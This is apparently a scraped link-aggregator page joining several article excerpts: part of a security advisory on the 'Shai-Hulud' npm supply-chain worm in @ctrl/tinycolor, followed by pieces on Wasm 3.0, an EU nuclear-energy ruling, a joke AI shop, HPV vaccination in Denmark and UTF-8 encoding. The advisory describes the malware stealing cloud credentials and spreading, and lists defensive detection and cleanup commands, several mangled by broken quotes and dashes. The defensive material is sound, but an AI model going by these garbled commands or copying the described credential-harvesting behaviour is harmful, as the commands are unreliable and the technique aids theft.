GitHub Actions work­flow. Harden-Runner suc­cess­fully flagged the sus­pi­cious be­hav­ior as anom­alous. The pub­lic in­sights from this test re­veal how the pay­load works:The com­pro­mised pack­age made unau­tho­rized API calls to api.github.com dur­ing the npm in­stall process­These API in­ter­ac­tions were flagged as anom­alous since le­git­i­mate pack­age in­stal­la­tions should not be mak­ing such ex­ter­nal API call­s­These run­time de­tec­tions con­firm the so­phis­ti­cated na­ture of the at­tack, with the mal­ware at­tempt­ing cre­den­tial har­vest­ing, self-prop­a­ga­tion to other pack­ages, and data ex­fil­tra­tion - all dur­ing what ap­pears to be a rou­tine pack­age in­stal­la­tion.The fol­low­ing in­di­ca­tors can help iden­tify sys­tems af­fected by this at­tack:Use these GitHub search queries to iden­tify po­ten­tially com­pro­mised repos­i­to­ries across your or­ga­ni­za­tion:Re­place ACME with your GitHub or­ga­ni­za­tion name and use the fol­low­ing GitHub search query to dis­cover all in­stance of shai-hu­lud-work­flow.yml in your GitHub en­vi­ron­ment.To find ma­li­cious branches, you can use the fol­low­ing Bash script:# List all re­pos and check for shai-hu­lud branch

gh repo list YOUR_ORG_NAME –limit 1000 –json name­With­Owner –jq .[].nameWithOwner’ | while read repo; do

gh api repos/$repo/branches” –jq .[] | se­lect(.name == shai-hulud”) | ‘$repo’ has branch: + .name’

doneThe ma­li­cious bun­dle.js file has a SHA-256 hash of: 46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09The fol­low­ing pack­ages have been con­firmed as com­pro­mised:If you use any of the af­fected pack­ages, take these ac­tions im­me­di­ately:# Check for af­fected pack­ages in your pro­ject

npm ls @ctrl/tinycolor

# Remove com­pro­mised pack­ages

npm unin­stall @ctrl/tinycolor

# Search for the known ma­li­cious bun­dle.js by hash

find . -type f -name *.js” -exec sha256­sum {} \; | grep 46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09″# Check for and re­move the back­door work­flow

rm -f .github/workflows/shai-hulud-workflow.yml

# Look for sus­pi­cious shai-hulud’ branches in all repos­i­to­ries

git ls-re­mote –heads ori­gin | grep shai-hu­lud

# Delete any ma­li­cious branches found

git push ori­gin –delete shai-hu­ludThe mal­ware har­vests cre­den­tials from mul­ti­ple sources. Rotate ALL of the fol­low­ing:Any cre­den­tials stored in AWS Secrets Manager or GCP Secret ManagerSince the mal­ware specif­i­cally tar­gets AWS Secrets Manager and GCP Secret Manager, you need to au­dit your cloud in­fra­struc­ture for unau­tho­rized ac­cess. The mal­ware uses API calls to enu­mer­ate and ex­fil­trate se­crets, so re­view­ing au­dit logs is crit­i­cal to un­der­stand­ing the scope of com­pro­mise.Start by ex­am­in­ing your CloudTrail logs for any sus­pi­cious se­cret ac­cess pat­terns. Look specif­i­cally for BatchGetSecretValue, ListSecrets, and GetSecretValue API calls that oc­curred dur­ing the time win­dow when the com­pro­mised pack­age may have been in­stalled. Also gen­er­ate and re­view IAM cre­den­tial re­ports to iden­tify any un­usual au­then­ti­ca­tion pat­terns or newly cre­ated ac­cess keys.# Check CloudTrail for sus­pi­cious se­cret ac­cess

aws cloud­trail lookup-events –lookup-attributes AttributeKey=EventName,AttributeValue=BatchGetSecretValue

aws cloud­trail lookup-events –lookup-attributes AttributeKey=EventName,AttributeValue=ListSecrets

aws cloud­trail lookup-events –lookup-attributes AttributeKey=EventName,AttributeValue=GetSecretValue

# Review IAM cre­den­tial re­ports for un­usual ac­tiv­ity

aws iam get-cre­den­tial-re­port –query Content’For Google Cloud Platform, re­view your au­dit logs for any ac­cess to the Secret Manager ser­vice. The mal­ware uses the @google-cloud/secret-manager li­brary to enu­mer­ate se­crets, so look for un­usual pat­terns of se­cret ac­cess. Additionally, check for any unau­tho­rized ser­vice ac­count key cre­ation, as these could be used for per­sis­tent ac­cess.# Review se­cret man­ager ac­cess logs

gcloud log­ging read resource.type=secretmanager.googleapis.com” –limit=50 –format=json

# Check for unau­tho­rized ser­vice ac­count key cre­ation

gcloud log­ging read protoPayload.methodName=google.iam.admin.v1.CreateServiceAccountKey”Check de­ploy keys and repos­i­tory se­crets for all pro­jects­Set up alerts for any new npm pub­lishes from your or­ga­ni­za­tion­The fol­low­ing steps are ap­plic­a­ble only for StepSecurity en­ter­prise cus­tomers. If you are not an ex­ist­ing en­ter­prise cus­tomer, you can start our 14 day free trial by in­stalling the StepSecurity GitHub App to com­plete the fol­low­ing re­cov­ery step.The NPM Cooldown check au­to­mat­i­cally fails a pull re­quest if it in­tro­duces an npm pack­age ver­sion that was re­leased within the or­ga­ni­za­tion’s con­fig­ured cooldown pe­riod (default: 2 days). Once the cooldown pe­riod has passed, the check will clear au­to­mat­i­cally with no ac­tion re­quired. The ra­tio­nale is sim­ple - most sup­ply chain at­tacks are de­tected within the first 24 hours of a ma­li­cious pack­age re­lease, and the pro­jects that get com­pro­mised are of­ten the ones that rushed to adopt the ver­sion im­me­di­ately. By in­tro­duc­ing a short wait­ing pe­riod be­fore al­low­ing new de­pen­den­cies, teams can re­duce their ex­po­sure to fresh at­tacks while still keep­ing their de­pen­den­cies up to date.

Here is an ex­am­ple show­ing how this check pro­tected a pro­ject from us­ing the com­pro­mised ver­sions of pack­ages in­volved in this in­ci­dent:We have added a new con­trol specif­i­cally to de­tect pull re­quests that up­graded to these com­pro­mised pack­ages. You can find the new con­trol on the StepSecurity dash­board.Use StepSecurity Harden-Runner to de­tect com­pro­mised de­pen­den­cies in CI/CDStepSecurity Harden-Runner adds run­time se­cu­rity mon­i­tor­ing to your GitHub Actions work­flows, pro­vid­ing vis­i­bil­ity into net­work calls, file sys­tem changes, and process ex­e­cu­tions dur­ing CI/CD runs. Harden-Runner de­tects the com­pro­mised nx pack­ages when they are used in CI/CD. Here is a sam­ple Harden-Runner in­sights page demon­strat­ing this de­tec­tion:If you’re al­ready us­ing Harden-Runner, we strongly rec­om­mend you re­view re­cent anom­aly de­tec­tions in your Harden-Runner dash­board. You can get started with Harden-Runner by fol­low­ing the guide at https://​docs.stepse­cu­rity.io/​harden-run­ner.The StepSecurity Threat Center pro­vides com­pre­hen­sive de­tails about this @ctrl/tinycolor com­pro­mise and all 40+ af­fected pack­ages. Access the Threat Center through your dash­board to view IOCs, re­me­di­a­tion guid­ance, and real-time up­dates as new com­pro­mised pack­ages are dis­cov­ered. Threat alerts are au­to­mat­i­cally de­liv­ered to your SIEM via AWS S3 and web­hook in­te­gra­tions, en­abling im­me­di­ate in­ci­dent re­sponse when sup­ply chain at­tacks oc­cur. Our de­tec­tion sys­tems iden­ti­fied this at­tack within min­utes of pub­li­ca­tion, pro­vid­ing early warn­ing be­fore wide­spread ex­ploita­tion.Use StepSecurity Artifact Monitor to de­tect soft­ware re­leases out­side of au­tho­rized pipeli­nesStepSe­cu­rity Artifact Monitor pro­vides real-time de­tec­tion of unau­tho­rized pack­age re­leases by con­tin­u­ously mon­i­tor­ing your ar­ti­facts across pack­age reg­istries. This tool would have flagged this in­ci­dent by de­tect­ing that the com­pro­mised ver­sions were pub­lished out­side of the pro­jec­t’s au­tho­rized CI/CD pipeline. The mon­i­tor tracks re­lease pat­terns, ver­i­fies prove­nance, and alerts teams when pack­ages are pub­lished through un­usual chan­nels or from un­ex­pected lo­ca­tions. By im­ple­ment­ing Artifact Monitor, or­ga­ni­za­tions can catch sup­ply chain com­pro­mises within min­utes rather than hours or days, sig­nif­i­cantly re­duc­ing the win­dow of ex­po­sure to ma­li­cious pack­ages.Learn more about im­ple­ment­ing Artifact Monitor in your se­cu­rity work­flow at https://​docs.stepse­cu­rity.io/​ar­ti­fact-mon­i­tor.The npm se­cu­rity team and pack­age main­tain­ers for their swift re­sponse to this in­ci­dent.@franky47, who promptly no­ti­fied the com­mu­nity through a GitHub is­sueThe col­lab­o­ra­tive ef­forts of se­cu­rity re­searchers, main­tain­ers, and com­mu­nity mem­bers con­tinue to be es­sen­tial in de­fend­ing against sup­ply chain at­tacks.The pop­u­lar @ctrl/tinycolor pack­age with over 2 mil­lion weekly down­loads has been com­pro­mised along­side 40+ other NPM pack­ages in a so­phis­ti­cated sup­ply chain at­tack dubbed Shai-Hulud”. The mal­ware self-prop­a­gates across main­tainer pack­ages, har­vests AWS/GCP/Azure cre­den­tials us­ing TruffleHog, and es­tab­lishes per­sis­tence through GitHub Actions back­doors - rep­re­sent­ing a ma­jor es­ca­la­tion in NPM ecosys­tem threats.StepSe­cu­ri­ty’s Harden-Runner pro­tects 8,000+ repos­i­to­ries with EDR-style run­time mon­i­tor­ing for CI/CD pipelines, stop­ping sup­ply chain at­tacks and se­cur­ing GitHub Actions.Learn how to se­cure Google Gemini in GitHub Actions with Harden-Runner, com­bin­ing ob­serv­abil­ity with run­time mon­i­tor­ing for CI/CD se­cu­rity

...

Read the original on www.stepsecurity.io »

6 1,020 shares, 38 trendiness

Wasm 3.0 Completed

Three years ago, ver­sion 2.0 of the Wasm stan­dard was (essentially) fin­ished, which brought a num­ber of new fea­tures, such as vec­tor in­struc­tions, bulk mem­ory op­er­a­tions, mul­ti­ple re­turn val­ues, and sim­ple ref­er­ence types.

In the mean­time, the Wasm W3C Community Group and Working Group have not been lazy. Today, we are happy to an­nounce the re­lease of Wasm 3.0 as the new live” stan­dard.

This is a sub­stan­tially larger up­date: sev­eral big fea­tures, some of which have been in the mak­ing for six or eight years, fi­nally made it over the fin­ish­ing line.

64-bit ad­dress space. Memories and ta­bles can now be de­clared to use i64 as their ad­dress type in­stead of just i32. That ex­pands the avail­able ad­dress space of Wasm ap­pli­ca­tions from 4 gi­ga­bytes to (theoretically) 16 ex­abytes, to the ex­tent that phys­i­cal hard­ware al­lows. While the web will nec­es­sar­ily keep en­forc­ing cer­tain lim­its — on the web, a 64-bit mem­ory is lim­ited to 16 gi­ga­bytes — the new flex­i­bil­ity is es­pe­cially in­ter­est­ing for non-web ecosys­tems us­ing Wasm, as they can sup­port much, much larger ap­pli­ca­tions and data sets now.

Multiple mem­o­ries. Contrary to pop­u­lar be­lief, Wasm ap­pli­ca­tions were al­ways able to use mul­ti­ple mem­ory ob­jects — and hence mul­ti­ple ad­dress spaces — si­mul­ta­ne­ously. However, pre­vi­ously that was only pos­si­ble by de­clar­ing and ac­cess­ing each of them in sep­a­rate mod­ules. This gap has been closed, a sin­gle mod­ule can now de­clare (define or im­port) mul­ti­ple mem­o­ries and di­rectly ac­cess them, in­clud­ing di­rectly copy­ing data be­tween them. This fi­nally al­lows tools like wasm-merge, which per­form static link­ing” on two or more Wasm mod­ules by merg­ing them into one, to work for all Wasm mod­ules. It also paves the way for new uses of sep­a­rate ad­dress spaces, e.g., for se­cu­rity (separating pri­vate data), for buffer­ing, or for in­stru­men­ta­tion.

Garbage col­lec­tion. In ad­di­tion to ex­pand­ing the ca­pa­bil­i­ties of raw lin­ear mem­o­ries, Wasm also adds sup­port for a new (and sep­a­rate) form of stor­age that is au­to­mat­i­cally man­aged by the Wasm run­time via a garbage col­lec­tor. Staying true to the spirit of Wasm as a low-level lan­guage, Wasm GC is low-level as well: a com­piler tar­get­ing Wasm can de­clare the mem­ory lay­out of its run­time data struc­tures in terms of struct and ar­ray types, plus un­boxed tagged in­te­gers, whose al­lo­ca­tion and life­time is then han­dled by Wasm. But that’s it. Everything else, such as en­gi­neer­ing suit­able rep­re­sen­ta­tions for source-lan­guage val­ues, in­clud­ing im­ple­men­ta­tion de­tails like method ta­bles, re­mains the re­spon­si­bil­ity of com­pil­ers tar­get­ing Wasm. There are no built-in ob­ject sys­tems, nor clo­sures or other higher-level con­structs — which would in­evitably be heav­ily bi­ased to­wards spe­cific lan­guages. Instead, Wasm only pro­vides the ba­sic build­ing blocks for rep­re­sent­ing such con­structs and fo­cuses purely on the mem­ory man­age­ment as­pect.

Typed ref­er­ences. The GC ex­ten­sion is built upon a sub­stan­tial ex­ten­sion to the Wasm type sys­tem, which now sup­ports much richer forms of ref­er­ences. Reference types can now de­scribe the ex­act shape of the ref­er­enced heap value, avoid­ing ad­di­tional run­time checks that would oth­er­wise be needed to en­sure safety. This more ex­pres­sive typ­ing mech­a­nism, in­clud­ing sub­typ­ing and type re­cur­sion, is also avail­able for func­tion ref­er­ences, mak­ing it pos­si­ble to per­form safe in­di­rect func­tion calls with­out any run­time type or bounds check, through the new cal­l_ref in­struc­tion.

Tail calls. Tail calls are a vari­ant of func­tion calls that im­me­di­ately exit the cur­rent func­tion, and thereby avoid tak­ing up ad­di­tional stack space. Tail calls are an im­por­tant mech­a­nism that is used in var­i­ous lan­guage im­ple­men­ta­tions both in user-vis­i­ble ways (e.g., in func­tional lan­guages) and for in­ter­nal tech­niques (e.g., to im­ple­ment stubs). Wasm tail calls are fully gen­eral and work for callees both se­lected sta­t­i­cally (by func­tion in­dex) and dy­nam­i­cally (by ref­er­ence or table).

Exception han­dling. Exceptions pro­vide a way to lo­cally abort ex­e­cu­tion, and are a com­mon fea­ture in mod­ern pro­gram­ming lan­guages. Previously, there was no ef­fi­cient way to com­pile ex­cep­tion han­dling to Wasm, and ex­ist­ing com­pil­ers typ­i­cally re­sorted to con­vo­luted ways of im­ple­ment­ing them by es­cap­ing to the host lan­guage, e.g., JavaScript. This was nei­ther portable nor ef­fi­cient. Wasm 3.0 hence pro­vides na­tive ex­cep­tion han­dling within Wasm. Exceptions are de­fined by de­clar­ing ex­cep­tion tags with as­so­ci­ated pay­load data. As one would ex­pect, an ex­cep­tion can be thrown, and se­lec­tively be caught by a sur­round­ing han­dler, based on its tag. Exception han­dlers are a new form of block in­struc­tion that in­cludes a dis­patch list of tag/​la­bel pairs or catch-all la­bels to de­fine where to jump when an ex­cep­tion oc­curs.

Relaxed vec­tor in­struc­tions. Wasm 2.0 added a large set of vec­tor (SIMD) in­struc­tions, but due to dif­fer­ences in hard­ware, some of these in­struc­tions have to do ex­tra work on some plat­forms to achieve the spec­i­fied se­man­tics. In or­der to squeeze out max­i­mum per­for­mance, Wasm 3.0 in­tro­duces relaxed” vari­ants of these in­struc­tions that are al­lowed to have im­ple­men­ta­tion-de­pen­dent be­hav­ior in cer­tain edge cases. This be­hav­ior must be se­lected from a pre-spec­i­fied set of le­gal choices.

Deterministic pro­file. To make up for the added se­man­tic fuzzi­ness of re­laxed vec­tor in­struc­tions, and in or­der to sup­port set­tings that de­mand or need de­ter­min­is­tic ex­e­cu­tion se­man­tics (such as blockchains, or re­playable sys­tems), the Wasm stan­dard now spec­i­fies a de­ter­min­is­tic de­fault be­hav­ior for every in­struc­tion with oth­er­wise non-de­ter­min­is­tic re­sults — cur­rently, this in­cludes float­ing-point op­er­a­tors and their gen­er­ated NaN val­ues and the afore­men­tioned re­laxed vec­tor in­struc­tions. Between plat­forms choos­ing to im­ple­ment this de­ter­min­is­tic ex­e­cu­tion pro­file, Wasm thereby is fully de­ter­min­is­tic, re­pro­ducible, and portable.

Custom an­no­ta­tion syn­tax. Finally, the Wasm text for­mat has been en­riched with generic syn­tax for plac­ing an­no­ta­tions in Wasm source code. Analogous to cus­tom sec­tions in the bi­nary for­mat, these an­no­ta­tions are not as­signed any mean­ing by the Wasm stan­dard it­self, and can be cho­sen to be ig­nored by im­ple­men­ta­tions. However, they pro­vide a way to rep­re­sent the in­for­ma­tion stored in cus­tom sec­tions in hu­man-read­able and writable form, and con­crete an­no­ta­tions can be spec­i­fied by down­stream stan­dards.

In ad­di­tion to these core fea­tures, em­bed­dings of Wasm into JavaScript ben­e­fit from a new ex­ten­sion to the JS API:

JS string builtins. JavaScript string val­ues can al­ready be passed to Wasm as ex­tern­refs. Functions from this new prim­i­tive li­brary can be im­ported into a Wasm mod­ule to di­rectly ac­cess and ma­nip­u­late such ex­ter­nal string val­ues in­side Wasm.

With these new fea­tures, Wasm has much bet­ter sup­port for com­pil­ing high-level pro­gram­ming lan­guages. Enabled by this, we have seen var­i­ous new lan­guages pop­ping up to tar­get Wasm, such as Java, OCaml, Scala, Kotlin, Scheme, or Dart, all of which use the new GC fea­ture.

On top of all these good­ies, Wasm 3.0 also is the first ver­sion of the stan­dard that has been pro­duced with the new SpecTec tool chain. We be­lieve that this makes for an even more re­li­able spec­i­fi­ca­tion.

Wasm 3.0 is al­ready ship­ping in most ma­jor web browsers, and sup­port in stand-alone en­gines like Wasmtime is on track to com­ple­tion as well. The Wasm fea­ture sta­tus page tracks sup­port across en­gines.

...

Read the original on webassembly.org »

7 956 shares, 33 trendiness

EU Court Rules Nuclear Energy is Clean Energy

with my fel­low youth cli­mate ac­tivists along­side WePlanet two years ago, I had no idea just how quickly the anti-nu­clear domi­noes would fall across Europe.

In 2023, and what seems like a life­time ago, Austria launched their le­gal ac­tion against the European Commission for the in­clu­sion of nu­clear en­ergy in the EU Sustainable Finance Taxonomy. At the time they were sup­ported by a bul­wark of EU coun­tries and en­vi­ron­men­tal NGOs that op­posed nu­clear en­ergy. Honestly, it looked like they might win.

Germany, long a sym­bol of anti-nu­clear pol­i­tics, is be­gin­ning to shift. The nu­clear phase-outs or bans in the Netherlands, Belgium, Switzerland, Denmark, and Italy are now his­tory. Even Fridays for Future has qui­etened its op­po­si­tion, and in some places, em­braced nu­clear power.

It shows what’s pos­si­ble when we stick to the sci­ence. The ev­i­dence only gets clearer by the day that nu­clear en­ergy has an ex­tremely low en­vi­ron­men­tal im­pact across its life­cy­cle, and strong reg­u­la­tions and safety cul­ture en­sure that it re­mains one of the safest forms of en­ergy avail­able to hu­man­ity.

The European Court of Justice has now fully dis­missed Austria’s law­suit. That rul­ing does­n’t just up­hold nu­clear en­er­gy’s place in EU green fi­nance rules. It also sig­nals a near-cer­tain de­feat for the on­go­ing Greenpeace case — the very law­suit that in­spired me to launch Dear Greenpeace in the first place.

But in­stead of learn­ing from this, Greenpeace is dou­bling down. Martin Kaiser, Executive Director of Greenpeace Germany, called the court de­ci­sion a dark day for the cli­mate”.

Let that sink in. The high­est court in the EU just reaf­firmed that nu­clear en­ergy meets the sci­en­tific and en­vi­ron­men­tal stan­dards to be in­cluded in sus­tain­able fi­nance, and Greenpeace still re­fuses to budge.

Meanwhile, the cli­mate cri­sis gets worse. Global emis­sions are not falling fast enough. Billions of peo­ple still lack ac­cess to clean, re­li­able elec­tric­ity. And we are forced to spend time de­fend­ing proven so­lu­tions in­stead of scal­ing them.

It’s now up to the court whether we will get our time in court to out­line the ev­i­dence in sup­port of nu­clear en­ergy and the im­por­tant role it can play in the global clean en­ergy tran­si­tion. Whether in court, on the streets, or in the halls of par­lia­ments across the globe, we will be there to de­fend the sci­ence and en­sure that nu­clear power can spread the ad­van­tages of the mod­ern world across the planet in a sus­tain­able, re­li­able and dig­ni­fied way.

Austria stands in­creas­ingly iso­lated among a hand­ful of coun­tries that still cling to their op­po­si­tion to nu­clear en­ergy. Their de­feat in this vi­tal high stakes topic is a suc­cess not just for the nu­clear move­ment, but for the global tran­si­tion as a whole.

We have made real progress. Together, we’ve helped de­fend nu­clear power in the EU, over­turned out­dated poli­cies at the World Bank, and se­cured more tech­nol­ogy-neu­tral lan­guage at the UN. These wins are not ab­stract. They open the door to real in­vest­ment, real pro­jects, and real emis­sions cuts.

This is a great suc­cess for the move­ment and it would not have been pos­si­ble with­out the fi­nan­cial sup­port, time and en­ergy given by peo­ple like you.

...

Read the original on www.weplanet.org »

8 930 shares, 40 trendiness

Anycrap 🛒 The Store of Infinite Products

We’ll find it some­where across par­al­lel di­men­sions, just tell us what you wantFind It NowWhat peo­ple are say­ingThis made me LoL so many times. It is the best thing to come from AIThis is the com­plete op­po­site of AI Slop: A web­site that turns ab­surd queries into un­be­liev­able pro­ducs, all for the lulzThis is a hi­lar­i­ous take on gen­er­a­tive AI: 😂 an in­fi­nite mar­ket­place of any im­pos­si­bly ab­surd prod­uct you can dream up. Ridiculous, but awe­some. And, a do­main that fit­sIt’s lit­er­ally an on­line store that sells… noth­ing. Well, it sells con­cepts of prod­ucts that don’t ex­ist. And it’s more than bril­liant!It’s just like the real ones, ex­cept you don’t have to deal with dis­ap­point­ment or the re­turns process. Many things in it could and should be real ob­jectsA web ser­vice that uses gen­er­a­tive AI to ful­fill the de­sire for I want this kind of prod­uct!’The in­ter­net is back! I haven’t felt such a thrilling sense of high-ef­fort whim­si­cal point­less­ness since the early 2000sI asked for in­vis­i­ble cheese burger, it was very vis­i­ble, very ter­ri­ble ser­vice, 10/10 would use againThis made me LoL so many times. It is the best thing to come from AIThis is the com­plete op­po­site of AI Slop: A web­site that turns ab­surd queries into un­be­liev­able pro­ducs, all for the lulzThis is a hi­lar­i­ous take on gen­er­a­tive AI: 😂 an in­fi­nite mar­ket­place of any im­pos­si­bly ab­surd prod­uct you can dream up. Ridiculous, but awe­some. And, a do­main that fit­sIt’s lit­er­ally an on­line store that sells… noth­ing. Well, it sells con­cepts of prod­ucts that don’t ex­ist. And it’s more than bril­liant!It’s just like the real ones, ex­cept you don’t have to deal with dis­ap­point­ment or the re­turns process. Many things in it could and should be real ob­ject­sAll our prod­ucts are unique con­cepts de­vel­oped specif­i­cally for our cus­tomers. Our prod­uct con­cepts are de­liv­ered in­stantly to your de­vice!Ex­pe­ri­ence a new way of shop­ping where imag­i­na­tion dri­ves in­no­va­tion.Be the first to dis­cover it! Give us a name and we’ll find it some­where­In­vent NowYou re­ally want emails about fic­tional prod­ucts every week? Well, okay then…© 2025 any­crap.shop — to­mor­row’s prod­ucts, avail­able to­day (not ac­tu­ally avail­able)

...

Read the original on anycrap.shop »

9 911 shares, 37 trendiness

Denmark close to wiping out leading cancer-causing HPV strains after vaccine roll-out

Denmark has ef­fec­tively elim­i­nated in­fec­tions with the two biggest can­cer-caus­ing strains of hu­man pa­pil­lo­mavirus (HPV) since the vac­cine was in­tro­duced in 2008, data sug­gests.

The re­search, pub­lished in Eurosurveillance, could have im­pli­ca­tions for how vac­ci­nated pop­u­la­tions are screened in the com­ing years — par­tic­u­larly as peo­ple in­creas­ingly re­ceive vac­cines that pro­tect against mul­ti­ple high-risk types of HPV virus.

After breast can­cer, cer­vi­cal can­cer is the most com­mon type of can­cer among women aged 15 to 44 years in Europe, and hu­man pa­pil­lo­mavirus (HPV) is the lead­ing cause.

At least 14 high-risk types of the virus have been iden­ti­fied, and be­fore Denmark in­tro­duced the HPV vac­cine in 2008, HPV types 16 and 18 ac­counted for around three quar­ters (74%) of cer­vi­cal can­cers in the coun­try.

Initially, girls were of­fered a vac­cine that pro­tected against four types of HPV: 16, 18, plus the lower risk types 6 and 11. However, since 2017, Danish girls have been of­fered a vac­cine that pro­tects against nine types of HPV — in­clud­ing those ac­count­ing for ap­prox­i­mately 90% of cer­vi­cal can­cers.

To bet­ter un­der­stand the im­pact that these vac­ci­na­tion pro­grammes have had on HPV preva­lence as vac­ci­nated girls reach cer­vi­cal screen­ing age (23 to 64 years in Denmark), Dr Mette Hartmann Nonboe at Zealand University Hospital in Nykøbing Falster and col­leagues analysed up to three con­sec­u­tive cer­vi­cal cell sam­ples col­lected from Danish women be­tween 2017 and 2024, when they were 22 to 30 years of age.

In 2017, one of the first birth co­horts of women in Denmark who were HPV-vaccinated as teenage girls in 2008 reached the screen­ing age of 23 years,” Nonboe ex­plained.

Compared with pre­vi­ous gen­er­a­tions, these women are ex­pected to have a con­sid­er­ably lower risk of cer­vi­cal can­cer, and it is per­ti­nent to as­sess [their] fu­ture need for screen­ing.”

The re­search found that in­fec­tion with the high-risk HPV types (HPV16/18) cov­ered by the vac­cine has been al­most elim­i­nated.

Before vac­ci­na­tion, the preva­lence of HPV16/18 was be­tween 15 and 17%, which has de­creased in vac­ci­nated women to less than one per­cent by 2021,” the re­searchers said.

In ad­di­tion, preva­lence of HPV types 16 and 18 in women who had not been vac­ci­nated against HPV was five per­cent. This strongly sug­gests that the vac­cine has re­duced the cir­cu­la­tion of these HPV types in gen­eral pop­u­la­tion, to the ex­tent that even un­vac­ci­nated women are now less likely to be in­fected with them — so called population im­mu­nity” — the re­searchers said.

Despite this good news, roughly one third of women screened dur­ing the study pe­riod still had in­fec­tion with high-risk HPV types not cov­ered by the orig­i­nal vac­cines — and new in­fec­tions with these types were more fre­quent among vac­ci­nated women, com­pared to un­vac­ci­nated ones.

This is ex­pected to fall once girls who re­ceived the more re­cent nine-valent’ vac­cine reach screen­ing age. At this point, the screen­ing guide­lines should po­ten­tially be re­con­sid­ered, Nonboe and col­leagues said.

...

Read the original on www.gavi.org »

10 728 shares, 29 trendiness

UTF-8 is a Brilliant Design — Vishnu's Pages

The first time I learned about UTF-8 en­cod­ing, I was fas­ci­nated by how well-thought and bril­liantly it was de­signed to rep­re­sent mil­lions of char­ac­ters from dif­fer­ent lan­guages and scripts, and still be back­ward com­pat­i­ble with ASCII.

Basically UTF-8 uses 32 bits and the old ASCII uses 7 bits, but UTF-8 is de­signed in such a way that:

* Every UTF-8 en­coded file that has only ASCII char­ac­ters is a valid ASCII file.

Designing a sys­tem that scales to mil­lions of char­ac­ters and still be com­pat­i­ble with the old sys­tems that use just 128 char­ac­ters is a bril­liant de­sign.

Note: If you are al­ready aware of the UTF-8 en­cod­ing, you can ex­plore the UTF-8 Playground util­ity that I built to vi­su­al­ize UTF-8 en­cod­ing.

UTF-8 is a vari­able-width char­ac­ter en­cod­ing de­signed to rep­re­sent every char­ac­ter in the Unicode char­ac­ter set, en­com­pass­ing char­ac­ters from most of the world’s writ­ing sys­tems.

It en­codes char­ac­ters us­ing one to four bytes.

The first 128 char­ac­ters (U+0000 to U+007F) are en­coded with a sin­gle byte, en­sur­ing back­ward com­pat­i­bil­ity with ASCII, and this is the rea­son why a file with only ASCII char­ac­ters is a valid UTF-8 file.

Other char­ac­ters re­quire two, three, or four bytes. The lead­ing bits of the first byte de­ter­mine the to­tal num­ber of bytes that rep­re­sents the cur­rent char­ac­ter. These bits fol­low one of four spe­cific pat­terns, which in­di­cate how many con­tin­u­a­tion bytes fol­low.

Notice that the sec­ond, third, and fourth bytes in a multi-byte se­quence al­ways start with 10. This in­di­cates that these bytes are con­tin­u­a­tion bytes, fol­low­ing the main byte.

The re­main­ing bits in the main byte, along with the bits in the con­tin­u­a­tion bytes, are com­bined to form the char­ac­ter’s code point. A code point serves as a unique iden­ti­fier for a char­ac­ter in the Unicode char­ac­ter set. A code point is typ­i­cally rep­re­sented in hexa­dec­i­mal for­mat, pre­fixed with U+”. For ex­am­ple, the code point for the char­ac­ter A” is U+0041.

So here is how a soft­ware de­ter­mines the char­ac­ter from the UTF-8 en­coded bytes:

Read a byte. If it starts with 0, it’s a sin­gle-byte char­ac­ter (ASCII). Show the char­ac­ter rep­re­sented by the re­main­ing 7 bits on the screen. Continue with the next byte.

If the byte did­n’t start with a 0, then:

If it starts with 110, it’s a two-byte char­ac­ter, so read the next byte as well.

If it starts with 1110, it’s a three-byte char­ac­ter, so read the next two bytes.

If it starts with 11110, it’s a four-byte char­ac­ter, so read the next three bytes.

Once the num­ber of bytes are de­ter­mined, read all the re­main­ing bits ex­cept the lead­ing bits, and find the bi­nary value (aka. code point) of the char­ac­ter.

Look up the code point in the Unicode char­ac­ter set to find the cor­re­spond­ing char­ac­ter and dis­play it on the screen.

Read the next byte and re­peat the process.

The Hindi let­ter अ” (officially Devanagari Letter A”) is rep­re­sented in UTF-8 as:

The first byte 11100000 in­di­cates that the char­ac­ter is en­coded us­ing 3 bytes.

The re­main­ing bits of the three bytes:

xxxx0000 xx100100 xx000101 are com­bined to form the bi­nary se­quence 00001001 00000101 (0x0905 in hexa­dec­i­mal). This is the code point of the char­ac­ter, rep­re­sented as U+0905.

The code point U+0905 (see of­fi­cial chart) rep­re­sents the Hindi let­ter अ” in the Unicode char­ac­ter set.

Now that we un­der­stood the de­sign of UTF-8, let’s look at a file that con­tains the fol­low­ing text:

The text Hey👋 Buddy has both English char­ac­ters and an emoji char­ac­ter on it. The text file with this text saved on the disk will have the fol­low­ing 13 bytes in it:

Let’s eval­u­ate this file byte-by-byte fol­low­ing the UTF-8 de­cod­ing rules:

Now this is a valid UTF-8 file, but it does­n’t have to be backward com­pat­i­ble” with ASCII be­cause it con­tains a non-ASCII char­ac­ter (the emoji). Next let’s cre­ate a file that con­tains only ASCII char­ac­ters.

The text file does­n’t have any non-ASCII char­ac­ters. The file saved on the disk has the fol­low­ing 9 bytes in it:

Let’s eval­u­ate this file byte-by-byte fol­low­ing the UTF-8 de­cod­ing rules:

So this is a valid UTF-8 file, and it is also a valid ASCII file. The bytes in this file fol­lows both the UTF-8 and ASCII en­cod­ing rules. This is how UTF-8 is de­signed to be back­ward com­pat­i­ble with ASCII.

I did a quick re­search on any other en­cod­ing that are back­ward com­pat­i­ble with ASCII, and there are a few, but they are not as pop­u­lar as UTF-8, for ex­am­ple GB 18030 (a Chinese gov­ern­ment stan­dard). Another one is the ISO/IEC 8859 en­cod­ings are sin­gle-byte en­cod­ings that ex­tend ASCII to in­clude ad­di­tional char­ac­ters, but they are lim­ited to 256 char­ac­ters.

The sib­lings of UTF-8, like UTF-16 and UTF-32, are not back­ward com­pat­i­ble with ASCII. For ex­am­ple, the let­ter A’ in UTF-16 is rep­re­sented as: 00 41 (two bytes), while in UTF-32 it is rep­re­sented as: 00 00 00 41 (four bytes).

When I was ex­plor­ing the UTF-8 en­cod­ing, I could­n’t find any good tool to in­ter­ac­tively vi­su­al­ize how UTF-8 en­cod­ing works. So I built UTF-8 Playground to vi­su­al­ize and play around with UTF-8 en­cod­ing. Give it a try!.

Read an ocean of knowl­edge and ref­er­ences that ex­tends this post on Hacker News.

You can also find dis­cus­sions on OSnews, lob­ste.rs, and Hackaday

Joel Spolsky’s fa­mous 2003 ar­ti­cle (still rel­e­vant): The Absolute Minimum Every Software Developer Absolutely, Positively Must Know About Unicode and Character Sets (No Excuses!)

UTF-8 was de­signed, in front of my eyes, on a place­mat in a New Jersey diner one night in September or so 1992.” - Rob Pike on de­sign­ing UTF-8 with Ken Thompson

